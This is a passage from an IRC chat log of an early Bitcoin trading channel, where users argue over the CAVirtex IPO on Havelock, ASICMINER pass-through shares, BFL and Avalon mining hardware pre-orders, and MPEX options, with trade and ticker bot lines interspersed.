who think they're smarter are much akin to the street prophets in ny. Mar 26 05:53:39 ฿215.44022652vol on BF Mar 26 05:53:41 Chaang-Noi exactly. Mar 26 05:53:42 too Mar 26 05:53:45 standards in btc? lol Mar 26 05:53:48 yes. Mar 26 05:54:04 Bowjob: yea it was announced on the website, but if you werent on teh website when it happened you wouldnt even have known Mar 26 05:54:13 i was baffled why he didnt want to announce it at least a few days ahead of time Mar 26 05:54:17 you show me one volume of one pt and say it means something about the company? im not the only one who would think that is silly Mar 26 05:54:19 give people time to prep and move funds to havelock Mar 26 05:54:31 sounds like an evoorhees move Mar 26 05:54:36 ie, stupid Mar 26 05:54:37 haha Mar 26 05:54:40 BCTC only holds 5342 shares Mar 26 05:54:42 Chaang-Noi you may not be the only one that thinks that's silly, but that's quite irrelevant. Mar 26 05:54:53 topace you gotta show people the light moar. Mar 26 05:55:04 mp, what happened to the avalon bet Mar 26 05:55:08 i dont see it on bitbet Mar 26 05:55:09 oh mp, tisk tisk tisk :) Mar 26 05:55:20 topace, whatever you did worked just fine Mar 26 05:55:25 [MPEX] [S.DICE] 300 @ 0.00449999 = 1.35 BTC [-] Mar 26 05:55:29 Bowjob did it close ? Mar 26 05:55:35 yeah it should be closed Mar 26 05:55:37 i think your just jelly it is not on your exchange and you did not invest with them:) Mar 26 05:55:41 but i dont see it anywgere Mar 26 05:55:44 hehe yea, i didnt do _anything_ all we did was put the banner on the www.cavirtex.com website and a news article on havelock website Mar 26 05:55:44 when i type avalon Mar 26 05:55:48 Bowjob then are you searching on the closed ones ? Mar 26 05:55:54 mhm Mar 26 05:56:00 thats all it needed apparently Mar 26 05:56:00 Chaang-Noi ya dude, totally. the fact that they failed to meet spec is something that makes me jelly. Mar 26 05:56:10 the fact that they've cost their investors 100k btc or so makes me jelly. Mar 26 05:56:14 i'm jelly to my ears, srsly. Mar 26 05:56:15 oh, found it Mar 26 05:56:21 maybe YOU didnt do this, but the asset also had a nice prospectus, and a video Mar 26 05:56:31 100,000 btc? lol you trollin? Mar 26 05:56:34 no. Mar 26 05:56:47 ThickAsThieves: yea, we delayed it 3 times due to prospectus re-writes Mar 26 05:56:48 so topace how are investors gonna get paid Mar 26 05:56:51 read the forum threads linked above, i won't bother rehashing it. Mar 26 05:56:53 how did they lose 100k btc then, lol Mar 26 05:56:54 i didnt see any dividends back Mar 26 05:56:57 that's what i pay pr for after all. Mar 26 05:56:57 on the sheet Mar 26 05:57:07 pure growth stock? Mar 26 05:57:15 im sure there'll be dividends eventually Mar 26 05:57:20 I'm interested on the leveraged trading, Mar 26 05:57:22 cant back up crazy claim, says not trollin, lol Mar 26 05:57:29 they just havent been announced yet Mar 26 05:57:31 i can lend some btc there, have 12% guaranteed Mar 26 05:57:36 Chaang-Noi https://bitcointalk.org/index.php?topic=151265.msg1605879#msg1605879 <<< read. Mar 26 05:57:49 if you watched the video.. he mentioned the leverage as part of cavirtex Mar 26 05:57:51 all I see is sour grapes tbh Mar 26 05:57:52 regarding asicminer, its still a very small amount of shares even being traded Mar 26 05:57:57 so i assume he's gonna need osme btc Mar 26 05:58:02 and in general, when you're sent to do reading it's because you're sprouting nonsense. Mar 26 05:58:11 and its guaranteed since i think they'll make people put up collateral Mar 26 05:58:16 [BTCTC] [B.YABMC] 1 @ 0.01965 BTC [+] Mar 26 05:58:21 Bowjob: yes, the leveraged trading will happen on virtex, using the short fund on havelock as collateral Mar 26 05:58:22 as ThickAsThieves is saying there is no market for AM beyond a couple of pissant PTs and some forum auctions Mar 26 05:58:37 dub that's exactly what "blowing your ipo" is. Mar 26 05:58:42 you wanted me to read inauncall your girl names? Mar 26 05:58:48 you're going "dude, i'm missing an eye and both legs" Mar 26 05:58:56 yes dude, you are. that's what fucking up is. missing body parts. Mar 26 05:59:02 [HAVELOCK] [VTX] 8 @ 0.75449999 = 6.036 BTC [+] Mar 26 05:59:04 [HAVELOCK] [VTX] 1 @ 0.7545 BTC [+] Mar 26 05:59:05 [HAVELOCK] [VTX] 5 @ 0.755 = 3.775 BTC [+] Mar 26 05:59:06 [HAVELOCK] [VTX] 3 @ 0.75999996 = 2.28 BTC [+] Mar 26 05:59:07 [HAVELOCK] [VTX] 19 @ 0.75999998 = 14.44 BTC [+] Mar 26 05:59:08 [HAVELOCK] [VTX] 3 @ 0.76 = 2.28 BTC [+] Mar 26 05:59:09 [BTCTC] [ASICMINER-PT] 1 @ 0.765 BTC [+] Mar 26 05:59:09 ooh Mar 26 05:59:10 [BTCTC] [ASICMINER-PT] 1 @ 0.76 BTC [-] Mar 26 05:59:10 bam! Mar 26 05:59:11 [BTCTC] [ASICMINER-PT] 2 @ 0.68 = 1.36 BTC [-] Mar 26 05:59:14 crazy Mar 26 05:59:33 imo best investments as a growth stock.. Mar 26 05:59:41 asicminer. and HIM at havelock Mar 26 05:59:50 nice btc multiplier Mar 26 05:59:50 what's him ? Mar 26 05:59:58 mircea_popescu: my mining fund Mar 26 05:59:59 same as asicminer, tho smaller Mar 26 06:00:05 [MPEX] [S.MPOE] 8273 @ 0.00064056 = 5.2994 BTC [-] Mar 26 06:00:15 the only thing that bothers me is that you took bfl pre orders Mar 26 06:00:17 mircea_popescu: yea, until fucking BFL delivers Mar 26 06:00:22 topace those do poorly historically. what's it got, fpga ? Mar 26 06:00:34 yea about 22GH atm, all FPGA Mar 26 06:00:42 since like, last summer Mar 26 06:00:43 VTX is going nicely Mar 26 06:00:49 https://bitcointalk.org/index.php?topic=147613.msg1676943#msg1676943 << lol bitbillions guy is still at it Mar 26 06:01:02 but we only pay out ~50% as dividends, with extra being reinvested Mar 26 06:01:06 in new hardware Mar 26 06:01:17 did you order any avalons Mar 26 06:01:17 so its not like lame gigaminer where you're buying a certian mh/s Mar 26 06:01:29 your share is always your percent share of the total Mar 26 06:01:35 oh, don't tell me about it... Mar 26 06:01:37 yeah thats a pretty good fund, i like it... but. dat bfl Mar 26 06:01:47 topace that's saner. Mar 26 06:01:54 indeed Mar 26 06:02:01 they are pretty silent over there, josh is just going insulting people on the forums Mar 26 06:02:03 as usual Mar 26 06:02:06 we were even outdoiing network increases and raising dividends Mar 26 06:02:13 due to the reinvestment in new fpga's Mar 26 06:02:18 until a few months ago Mar 26 06:02:22 when all the ASIC shit hit the fan Mar 26 06:03:04 but... we also have 1.8Th on pre-order, and most of which will be paid for with re-invested earnings (so no need to issue new units to buy the units up front) Mar 26 06:03:09 thanks to the btc appreciation Mar 26 06:03:31 what we had saved to buy asics to cover 4-6 units, now will cover pretty much all 30 units we have on preorder Mar 26 06:04:11 topace the pre-order is on bfl ? Mar 26 06:04:16 yea Mar 26 06:04:19 ouch Mar 26 06:04:25 dating back to the first week of pre-orders Mar 26 06:04:27 that bothers me, lol Mar 26 06:04:38 how much was the 1.5 minirig Mar 26 06:04:40 in btc Mar 26 06:04:41 a, it's not paid yet ? Mar 26 06:04:48 yea, starting to really bother me too.. however -- its not paid for with HIM funds Mar 26 06:04:50 so basically you hold the early option to 1.8th of bfl Mar 26 06:04:52 its all paid for with my personal funds Mar 26 06:04:55 at a fixed early price ? Mar 26 06:05:00 uh Mar 26 06:05:03 when they are sitting on my desk, HIM buys them from ME Mar 26 06:05:08 o i c. Mar 26 06:05:12 you fool :D Mar 26 06:05:13 at a markup of course Mar 26 06:05:19 hehe, worked well for the fpga's Mar 26 06:05:34 bfl will deliver Mar 26 06:05:36 next thing out of my mouth was "so are you lending stock ?" but averted. Mar 26 06:05:36 just a matter of when Mar 26 06:05:47 31 BTC says not until july at least Mar 26 06:06:02 http://bitbet.us/bet/307/bfl-will-deliver-asic-devices-before-july-1st/ Mar 26 06:06:22 mhm, maybe its a good idea to make my own mini farm starting with 1 avalon Mar 26 06:06:23 i think im going to lose my bet thinking bfl would ship this month, lol Mar 26 06:06:26 have them multiply Mar 26 06:06:26 oh well Mar 26 06:06:32 i'll drive my parents nuts Mar 26 06:06:43 shipping april 1st Mar 26 06:06:52 "The other factor, of course, is that Bitcoin can't be manipulated as easily as gold and silver obviously are. " Mar 26 06:06:54 perfect day for bfl Mar 26 06:06:56 dude wat Mar 26 06:06:59 fools day, lol Mar 26 06:07:20 the first buyers were better off holding btc Mar 26 06:07:21 that would be perfect Mar 26 06:07:33 i went long on bitcoinica :) Mar 26 06:09:33 anyone know the bitcoinity ppl ? Mar 26 06:10:52 ty Mar 26 06:11:00 ;;goxlag Mar 26 06:11:01 0 seconds Mar 26 06:11:04 ;;ticker Mar 26 06:11:05 BTCUSD ticker | Best bid: 75.60501, Best ask: 75.69800, Bid-ask spread: 0.09299, Last trade: 75.60500, 24 hour volume: 80478.52504177, 24 hour low: 69.80000, 24 hour high: 78.00000, 24 hour vwap: 74.59924 Mar 26 06:12:35 anywho, im off Mar 26 06:12:39 later! Mar 26 06:12:57 pce Mar 26 06:14:02 i wonder if there's gonna be a bet before may 1st avalon Mar 26 06:14:06 err.. i meant bfl Mar 26 06:14:16 or we just go straight to july Mar 26 06:14:40 [MPEX] [O.BTCUSD.C630T] 1000 @ 0.19996944 = 199.9694 BTC [+] Mar 26 06:14:42 [MPEX] [O.BTCUSD.C610T] 1000 @ 0.22859638 = 228.5964 BTC [+] Mar 26 06:14:44 [MPEX] [O.BTCUSD.C650T] 1000 @ 0.17290381 = 172.9038 BTC Mar 26 06:14:53 [MPEX] [O.BTCUSD.C690T] 1000 @ 0.12457025 = 124.5703 BTC Mar 26 06:14:55 [MPEX] [O.BTCUSD.C670T] 1000 @ 0.14768862 = 147.6886 BTC Mar 26 06:14:56 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.10373103 = 103.731 BTC [+] Mar 26 06:15:04 [MPEX] [O.BTCUSD.C750T] 1000 @ 0.06926151 = 69.2615 BTC [+] Mar 26 06:15:05 o hey Mar 26 06:15:06 [MPEX] [O.BTCUSD.C730T] 1000 @ 0.08527783 = 85.2778 BTC [+] Mar 26 06:15:36 !ticker m ^oix Mar 26 06:15:38 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 48.45538965 / 66.4177076 / 76.84005554 (33537 shares, 2,737.95 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 26 06:15:38 someones making bank Mar 26 06:15:48 these need like what, 79 or so ? Mar 26 06:16:22 correct Mar 26 06:16:31 mp: are you under the assumption options tend to predict the future? Mar 26 06:16:59 sentiment can become self-fulfilling, like chart-reading Mar 26 06:17:10 options tend to expire worthless Mar 26 06:17:45 like debates with you? Mar 26 06:18:03 [HAVELOCK] [VTX] 1 @ 0.75999999 BTC [-] Mar 26 06:18:06 sry that was called for Mar 26 06:18:06 you never have anything to debate Mar 26 06:18:13 wasnt Mar 26 06:18:15 lol Mar 26 06:18:27 we havent debated? oh Mar 26 06:20:03 tiberiusiv did you read the oix article ? Mar 26 06:20:51 mircea_popescu: i think mpex shares declined due to missing out on the cavirtex ipo Mar 26 06:21:13 what, thre's some golden rule that all ipos must happen on mpex or something ? Mar 26 06:21:18 cavirtex may have been the most successful ipo to date? Mar 26 06:21:33 i dont even think sdice sold out that fast Mar 26 06:22:01 mircea: well, it would have been nice that the higher quality issuances use mpex Mar 26 06:22:17 [MPEX] [O.BTCUSD.C610T] 1000 @ 0.22856513 = 228.5651 BTC [-] Mar 26 06:22:19 [MPEX] [O.BTCUSD.C650T] 1000 @ 0.17285328 = 172.8533 BTC [-] Mar 26 06:22:21 [MPEX] [O.BTCUSD.C670T] 1000 @ 0.1476286 = 147.6286 BTC [-] Mar 26 06:22:22 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.10365616 = 103.6562 BTC [-] Mar 26 06:22:29 you were just born last night so you think this morning is "the best morning to date". Mar 26 06:22:32 [MPEX] [O.BTCUSD.C730T] 1000 @ 0.08519875 = 85.1988 BTC [-] Mar 26 06:22:34 [MPEX] [O.BTCUSD.C750T] 1000 @ 0.06918073 = 69.1807 BTC [-] Mar 26 06:22:38 for the record, bitbet is a tiny corp and collected something like that. Mar 26 06:22:44 s.dice got 50k or so in ipo funds. Mar 26 06:22:58 bitbet collected $300k ? Mar 26 06:23:05 how when most of the shares are still for sale Mar 26 06:23:31 [BTCTC] [ASICMINER-PT] 1 @ 0.69 BTC [+] Mar 26 06:23:32 [BTCTC] [ASICMINER-PT] 1 @ 0.681 BTC [-] Mar 26 06:23:34 [BTCTC] [ASICMINER-PT] 2 @ 0.68 = 1.36 BTC [-] Mar 26 06:23:36 [BTCTC] [ASICMINER-PT] 3 @ 0.68 = 2.04 BTC [-] Mar 26 06:23:37 what is your point tib? that mpex must bow to havelock? Mar 26 06:23:38 [BTCTC] [ASICMINER-PT] 2 @ 0.67 = 1.34 BTC [-] Mar 26 06:23:41 [BTCTC] [ASICMINER-PT] 4 @ 0.66 = 2.64 BTC [-] Mar 26 06:23:43 [BTCTC] [ASICMINER-PT] 8 @ 0.6591 = 5.2728 BTC [-] Mar 26 06:23:47 o boy. Mar 26 06:23:54 thickasthieves: no it was just interesting to see the stock price react Mar 26 06:24:02 did it? Mar 26 06:24:11 it went down like 15% Mar 26 06:24:19 which are you refering to? Mar 26 06:24:25 http://mpex.co/?mpsic=S.MPOE Mar 26 06:24:26 yeah, well, prices vary a lot more than that for a lot less reason. Mar 26 06:24:31 s.dice went to 0.008 one day just so. Mar 26 06:24:32 lol Mar 26 06:24:39 whats was the volume? Mar 26 06:24:45 like a fuckton Mar 26 06:24:49 400 worth of btc was it Mar 26 06:24:53 asicminer tanked too ? Mar 26 06:25:00 Bowjob huge, like 1mn shares Mar 26 06:25:24 yeah AM forked Mar 26 06:25:25 yeah so around 4k btc worth... at the time? Mar 26 06:25:37 i remember the fiat value was about 80k usd Mar 26 06:25:53 so what exactly is asicminer? avalons equipment Mar 26 06:26:02 and they payout what they mined Mar 26 06:26:10 it was equally painful and pleasurable for the parties Mar 26 06:26:19 or were they using asicminer shares to finance avalon orders lol Mar 26 06:26:26 involved in the 0.008 transaction Mar 26 06:26:47 well i asume its painful for just 1 party lol Mar 26 06:27:02 [BTCTC] [ASICMINER-PT] 1 @ 0.74 BTC [+] Mar 26 06:27:06 [BTCTC] [ASICMINER-PT] 2 @ 0.75 = 1.5 BTC [+] Mar 26 06:27:38 asicminer up 12% Mar 26 06:27:42 ;) Mar 26 06:27:49 i think over the longrun you will be better off just owning btc outright then btc companies Mar 26 06:27:53 lol ThickAsThieves Mar 26 06:27:53 same thing applied to gold Mar 26 06:28:04 there never were "gold companies" Mar 26 06:28:09 miners Mar 26 06:28:15 this is not what btc companies are. Mar 26 06:28:34 theres also been countless gold transfer firms that have busted too Mar 26 06:28:55 btc companies work for short time periods before competition becomes intense Mar 26 06:29:00 still not a valid comparison. Mar 26 06:29:21 listen, you have this broken approach to learning whereby you make definitive statements that are both wrong and uninformed Mar 26 06:29:27 with the expectation someone will argue you into sense. Mar 26 06:29:34 this is unwarranted, nobody really cares. Mar 26 06:29:46 really they are wrong? like mtgox losing market share for 2 years? Mar 26 06:29:54 [MPEX] [O.BTCUSD.C710T] 5 @ 0.119 = 0.595 BTC [+] Mar 26 06:29:55 this isn't a school setting and you're certainly not the clever kid in the class or anything. Mar 26 06:29:57 and mpex having no listings outside of sdice Mar 26 06:30:13 and you can't manipulate me into it either, simply because of the size differential. Mar 26 06:30:43 you can make all the statements you want mp, facts speak for themselves and mpex has 1 firm on it that is not related to mpex. Mar 26 06:31:47 mpex's only "edge" so far is its dominance of option trading Mar 26 06:32:13 [MPEX] [O.BTCUSD.C730T] 8 @ 0.0981512 = 0.7852 BTC [+] Mar 26 06:32:14 [MPEX] [O.BTCUSD.C730T] 10 @ 0.10153501 = 1.0154 BTC [+] Mar 26 06:32:15 [MPEX] [O.BTCUSD.C750T] 600 @ 0.086 = 51.6 BTC [+] Mar 26 06:32:15 [MPEX] [O.BTCUSD.C750T] 10 @ 0.09959 = 0.9959 BTC [+] Mar 26 06:32:16 [MPEX] [O.BTCUSD.C750T] 5 @ 0.0869 = 0.4345 BTC [-] Mar 26 06:35:26 My first day trading options on MPEX and I'm up 22.5%, heyo! Mar 26 06:35:55 similar reports will not be given when i lose Mar 26 06:36:43 lol >.> Mar 26 06:37:55 [BTCTC] [BASIC-MINING] 14 @ 0.344 = 4.816 BTC [+] Mar 26 06:38:05 [MPEX] [O.BTCUSD.C750T] 600 @ 0.06917259 = 41.5036 BTC [-] Mar 26 06:38:45 [BTCTC] [BASIC-MINING] 6 @ 0.34999 = 2.0999 BTC [+] Mar 26 06:39:23 [MPEX] [O.BTCUSD.C750T] 400 @ 0.06917259 = 27.669 BTC [-] Mar 26 06:39:30 ;;ticker Mar 26 06:39:31 BTCUSD ticker | Best bid: 75.00002, Best ask: 75.51612, Bid-ask spread: 0.51610, Last trade: 75.51612, 24 hour volume: 80957.53550534, 24 hour low: 70.78624, 24 hour high: 78.00000, 24 hour vwap: 74.64243 Mar 26 06:41:20 and bids are increasing Mar 26 06:42:36 ;;bids 70 Mar 26 06:42:40 There are currently 10614.009 bitcoins demanded at or over 70.0 USD, worth 759660.325336 USD in total. | Data vintage: 0.0074 seconds Mar 26 06:42:42 ;;asks 80 Mar 26 06:42:43 There are currently 9697.4468 bitcoins offered at or under 80.0 USD, worth 761706.200795 USD in total. | Data vintage: 3.0644 seconds Mar 26 06:42:51 fight! Mar 26 06:43:23 eheh Mar 26 06:43:46 I could see us reaching 100... or at least hitting against the resistance there. Mar 26 06:43:58 But I want price to crash Mar 26 06:44:06 Just reaching 100 would be fun Mar 26 06:44:07 you bought puts? Mar 26 06:44:20 nay Mar 26 06:44:23 Well... Mar 26 06:44:33 I got puts at 31 from the beggining of the month >.> Mar 26 06:44:44 eh, im in this for the long haul, let the bears have their fun Mar 26 06:44:50 I could sell them into the 2 satoshi bids... Mar 26 06:44:52 in the form of flash crashes Mar 26 06:45:52 honestly, i have no clue about crashes.. im sure no one really knows for sure Mar 26 06:46:27 [BTCTC] [S.DICE-PT] 90 @ 0.00492 = 0.4428 BTC [+] Mar 26 06:47:52 [BTCTC] [ASICMINER-PT] 1 @ 0.7 BTC [-] Mar 26 06:47:54 [BTCTC] [ASICMINER-PT] 1 @ 0.69 BTC [-] Mar 26 06:47:56 [BTCTC] [ASICMINER-PT] 1 @ 0.68 BTC [-] Mar 26 06:47:58 well if btc crashes to 31, ian will turn legit Mar 26 06:48:30 Let the price flash crash to 0.01 USD per BTC (MtGox hax #2) Mar 26 06:48:51 ;;bids 0 Mar 26 06:48:52 people are paying a lot of money for virtex Mar 26 06:48:54 There are currently 36697360 bitcoins demanded at or over 0.0 USD, worth 8718811.60498 USD in total. | Data vintage: 0.0179 seconds Mar 26 06:49:09 VTX? Mar 26 06:49:13 yes Mar 26 06:49:28 !ticker h VTX Mar 26 06:49:30 [HAVELOCK:VTX] 1D: 0.50000000 / 0.72102007 / 0.79900000 (428 shares, 308.59659097 BTC), 7D: 0.38280000 / 0.41994834 / 0.79900000 (11169 shares, 4690.40300358 BTC), 30D: 0.38280000 / 0.41994834 / 0.79900000 (11169 shares, 4690.40300358 BTC) Mar 26 06:49:33 pigeons, remember that most stuff on Havelock go to 10% or under per year Mar 26 06:49:46 [BTCTC] [ASICMINER-PT] 1 @ 0.7 BTC [+] Mar 26 06:49:58 well there's only 2 cases other than SDICE... not really representative... Mar 26 06:50:08 but people pay a good price/income on there Mar 26 06:50:29 i mean people are paying a lot of money for mpoe Mar 26 06:50:46 but assuming a minimum of 1k BTC traded daily and average of 2% fees. Mar 26 06:51:02 That's 20 BTC daily or 0.0002 per share Mar 26 06:51:13 so 0.073 per year Mar 26 06:51:28 if that's 10% per year, than price should be at least 0.73 Mar 26 06:51:31 pigeons: virtex is real canadian shares though Mar 26 06:51:39 That too... Mar 26 06:51:55 pigeons: they have to be audited etc. Mar 26 06:52:21 we've seen what that's worth Mar 26 06:52:32 http://www.youtube.com/watch?v=JI2LVH4JfV0 Mar 26 06:52:42 why litecoin will beat bitcoin Mar 26 06:53:11 litecoin is a joke Mar 26 06:53:45 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [+] Mar 26 06:54:05 [MPEX] [O.BTCUSD.C610T] 1000 @ 0.22859638 = 228.5964 BTC [+] Mar 26 06:54:15 [MPEX] [O.BTCUSD.C650T] 1000 @ 0.17282361 = 172.8236 BTC [-] Mar 26 06:54:17 [MPEX] [O.BTCUSD.C670T] 1000 @ 0.14756634 = 147.5663 BTC [-] Mar 26 06:54:18 [MPEX] [O.BTCUSD.C710T] 1000 @ 0.10353607 = 103.5361 BTC [-] Mar 26 06:54:19 [MPEX] [O.BTCUSD.C730T] 1000 @ 0.08505736 = 85.0574 BTC [-] Mar 26 06:54:20 [MPEX] [O.BTCUSD.C750T] 1000 @ 0.06902428 = 69.0243 BTC [-] Mar 26 06:54:39 [MPEX] [O.BTCUSD.C750T] 1000 @ 0.08 = 80 BTC [+] Mar 26 06:54:58 wait they charge 2% on the btc side of the trade? Mar 26 06:55:08 yeah both sides Mar 26 06:55:12 fiat and btc side Mar 26 06:56:29 Ukto: you need to get some of that market Mar 26 06:56:46 [MPEX] [O.BTCUSD.C690T] 1000 @ 0.12440874 = 124.4087 BTC [-] Mar 26 06:57:28 i had a guy tell me yesterday he wanted to deposit cad with weex but was afraid since the market was so thin, he'd have to pay the 4.50$ withdraw fee Mar 26 06:58:44 lol Mar 26 06:59:06 cavirtex fees will be down alot by the end of the year Mar 26 06:59:46 so far cavirtex is the fastest withdraw/deposit exchange available Mar 26 07:00:08 under 2hrs to fund in canada, and same day withdrawls Mar 26 07:00:17 that is fast Mar 26 07:00:34 bitcoin-central does the same thing really. Mar 26 07:00:36 only downside is its mostly catering to canadians at this point Mar 26 07:00:54 can i fund bitcoin-central in 20,000 locations? Mar 26 07:01:00 in about two million. Mar 26 07:01:05 without having to deal with charlie shrem and bitinstant Mar 26 07:01:11 or w/e banking locatyions there are in the sepa zone. Mar 26 07:01:13 yes. Mar 26 07:01:19 mircea_popescu: have you gotten any further along in trying to short asicminer? Mar 26 07:01:30 they're what cavirtex aspires to be. banking partners and all. Mar 26 07:01:32 true SEPA is nice Mar 26 07:01:43 toffoo only in the sense bugpowder is now also looking for shares. Mar 26 07:01:50 to short? Mar 26 07:01:52 yea Mar 26 07:02:01 mircea: how deep is bitcoin-central order book Mar 26 07:02:24 not very. Mar 26 07:02:25 if you could borrow them, how/where would you sell them? Mar 26 07:02:44 toffoo i'd have a broker sell them for me. Mar 26 07:02:51 where? Mar 26 07:02:54 wherever they are Mar 26 07:03:03 toffoo: on the exchange they trade at Mar 26 07:03:23 the liquidity on the two passthroughs is low (especially on the bid side) Mar 26 07:03:51 asicminer is not listed on an exchange, it is not publicly traded, the stuff on the exchanges are just pt's sorta Mar 26 07:04:05 bioshock infinittte! Mar 26 07:04:18 toffoo yea well, i wouldn't borrow mystical "asciminer" shares. i'd borrow actual tradeable instruments. Mar 26 07:04:20 [MPEX] [S.MPOE] 5450 @ 0.00064056 = 3.4911 BTC [-] Mar 26 07:04:28 most of the volume of asic miner is traded otc on the forum Mar 26 07:04:30 has anyone made you a real offer to loan them? INAU? Mar 26 07:04:50 toffoo he made a fool of himself, as in, went all tough into offering them but then failed to actually go through. Mar 26 07:05:01 not sure what his thinking was exactly. Mar 26 07:05:11 how many are you thinking of shorting? (roughly) Mar 26 07:05:32 i thought about it, but i did not think the pay off of 1% or so was worth the risk of putting them on an exchange Mar 26 07:05:39 i dunno, a few thousand ? Mar 26 07:05:56 I was thinking about it too (loaning them) Mar 26 07:06:14 what sort of term can you live with ? Mar 26 07:06:24 but at first glance it didn't seem like a very good idea ... Mar 26 07:06:34 but i thought about it a little deeper today, Mar 26 07:06:37 have you seen the bids on the PT's ? not many, also when it is time to buy back, you might not has the asks... this might not be a good thing to short (if you do a pt) Mar 26 07:06:48 well as a rule of thumb, if loaning them isn't a good idea selling them usually is a good idea. Mar 26 07:06:49 and maybe came up with an idea that makes more sense (for both parties) Mar 26 07:06:53 outside of cp risk consideratios Mar 26 07:07:06 toffoo a good starting point would be the old short contract i made for public use Mar 26 07:07:07 http://www.bitcoincard.org/ Mar 26 07:07:08 it was the cp risk considerations that I didn't like Mar 26 07:07:11 whatever happend to this? Mar 26 07:07:20 http://polimedia.us/bitcoin/mphf.txt Mar 26 07:07:28 lemme take a look at that ... Mar 26 07:07:38 https://bitcointalk.org/index.php?topic=157951.msg1677720#msg1677720 Mar 26 07:07:52 still deciding if this guy can be trusted or not Mar 26 07:07:56 he seems to want an avalon 3 Mar 26 07:08:49 are they even still forsale? Mar 26 07:08:53 the local begger Mar 26 07:08:59 loaning btc is just asking for it to be gone... Mar 26 07:09:19 0.5btc says he spends his borrowed funds on sdice Mar 26 07:09:25 Bowjob i wouldn't be borrowing btc to unheard of ppl. Mar 26 07:09:38 mircea_popescu: so did that trade actually happen? Mar 26 07:09:46 yeah Mar 26 07:10:03 yes yes of course. he's an uknown.. Mar 26 07:10:06 my condolences ?? Mar 26 07:10:10 why ? Mar 26 07:10:15 expired worthless. Mar 26 07:10:37 so you didn't sell the shares you borrowed? Mar 26 07:10:51 i did sell them, yes. Mar 26 07:11:01 did you actually read that thing ? Mar 26 07:11:14 just skimmed it ;D Mar 26 07:11:32 so you covered a long time ago? Mar 26 07:11:33 yes well that doesn't work too well for contracts. Mar 26 07:11:35 no. Mar 26 07:11:38 when mpex call options book is empty, then what? Mar 26 07:11:39 it.expired.worthless. Mar 26 07:11:52 "And that the Lendee shall cause the shares be returned to the Lender on December Mar 26 07:11:52 the 19th, 2012, or at his preference pay their value calculated as the average Mar 26 07:11:52 price during the past five days, except if ASICMINER should have become disconti Mar 26 07:11:52 nued or are no longer traded in which case a token payment of 1 BTC shall be suf Mar 26 07:11:52 ficient." Mar 26 07:11:58 ThickAsThieves then nothing ? or what you mean Mar 26 07:12:26 thickasthieves: his bot will just fill it up. Mar 26 07:12:30 thx Mar 26 07:12:39 is that on a schedule or? Mar 26 07:12:58 yeah about ten minutes or so roughly. Mar 26 07:13:13 along with trades Mar 26 07:13:14 did you pay the 1 btc? Mar 26 07:13:48 iirc yea Mar 26 07:14:13 thx Mar 26 07:14:20 well asicminer is still traded just otc and not on an exchange. Mar 26 07:14:49 Yeah. I got a whole BTC to show for that contract >.> Mar 26 07:14:55 yeah but as i said above, " toffoo yea well, i wouldn't borrow mystical "asciminer" shares. i'd borrow actual tradeable instruments." Mar 26 07:15:02 I just really wasn't expecting GLBSE to go down. Mar 26 07:15:03 however it would be hard to find an average price Mar 26 07:15:16 ChaangNoi exactly. Mar 26 07:15:28 there's no practical way to do stuff like shorting unless there's functioning markets. Mar 26 07:15:37 i agree Mar 26 07:15:42 which is why stupid shit like what friedcat is pulling is at best harmful Mar 26 07:15:45 that is why i think it is very hard to short this stock Mar 26 07:15:46 if he's not outright scamming. Mar 26 07:15:51 shorting a pt is risky Mar 26 07:15:55 [BTCTC] [ASICMINER-PT] 1 @ 0.7 BTC [-] Mar 26 07:16:02 [BTCTC] [ASICMINER-PT] 2 @ 0.69 = 1.38 BTC [-] Mar 26 07:16:04 [BTCTC] [ASICMINER-PT] 1 @ 0.68 BTC [-] Mar 26 07:16:45 i dont think he is scamming, he just does not want a second glbse fail, this is him making sure he wont lose money again Mar 26 07:17:04 i don't think he is either. Mar 26 07:17:13 it is susspected nefario took some of the shares and claimed them as his own, Mar 26 07:17:16 honestly i think he failed to uinderstand that operations is just piece of the pie, not the whole pie Mar 26 07:17:25 had some "helpers" of the typical sort doing an exchange Mar 26 07:17:27 which failed Mar 26 07:17:34 and got himself stuck and with no time to handle things. Mar 26 07:17:45 his goal was to get the money to make the stuff, he has it, he could care less about the share price as he will no longer sell shares Mar 26 07:17:51 yes well... Mar 26 07:17:53 that's asinine. Mar 26 07:17:55 he and many of us, are in it for the dividends, not share price Mar 26 07:18:02 that's besides the point. Mar 26 07:18:19 when you run a public company you owe your shareholders some basic stuff. Mar 26 07:18:32 he wont sell shares if the price is .001 or 20 btc he does not need an exchange Mar 26 07:18:38 the time/effort he put into handmanaging email transfers by now is an eyesore in his books Mar 26 07:18:46 (which he prolly doesn't actually keep) Mar 26 07:18:48 he is letting us trade the shares, he is letting us do PTs Mar 26 07:19:11 the time he spends on that is better than a second glbse fail Mar 26 07:19:22 he lots a lot of btc and a lot of people lots shares Mar 26 07:19:31 yeah, he misjudged glbse at that time. Mar 26 07:19:35 this doesn't mean anything about the world Mar 26 07:19:43 it just means something about his financial competence. Mar 26 07:19:58 he thinks at this time there is not a safe exchange to list at Mar 26 07:20:08 actually asicminer was way ahead of the game in predicting glbse's demise ... Mar 26 07:20:12 no, he just thinks he doesn't have a clue about such matters. Mar 26 07:20:14 i have no problem with the way he is doing things honestly Mar 26 07:20:20 anyway, at about the same time asicminer got started i wanted to list mpoe. Mar 26 07:20:34 it was obvious to me glbse is going to shit, and so i saw myself forced to make an exchang Mar 26 07:20:38 there's a difference. Mar 26 07:20:47 toffoo notrly. Mar 26 07:20:56 yes rly Mar 26 07:20:59 they're still 1-2k btc locked in there aren't they Mar 26 07:21:12 he is not in the business of making an exchange, his skills is making asics, or if he can do both, the better money for his time is asics Mar 26 07:21:13 this is not predicting anything, keeping 1k+ in cash on global scam exchange. Mar 26 07:21:27 ChaangNoi this fails to explain why he said he was making one. Mar 26 07:21:30 glbse was going down hill, nefario was a nutter Mar 26 07:21:35 actually... promised to. Mar 26 07:21:54 ChaangNoi bitch, quit it. you were his main supporter back in september when i was the only one saying this Mar 26 07:21:59 mp he might have started to make one, but found it not safe or that he was too busy making asics to finish Mar 26 07:22:15 no. he promised an exchange, he failed to deliver it, never mentioned it again Mar 26 07:22:17 lol yeah nefario and i have always been close Mar 26 07:22:22 stop trying to alter history on me, i won't let it pass. Mar 26 07:22:27 yes, you have. Mar 26 07:22:36 up until he up and kicked you. Mar 26 07:22:51 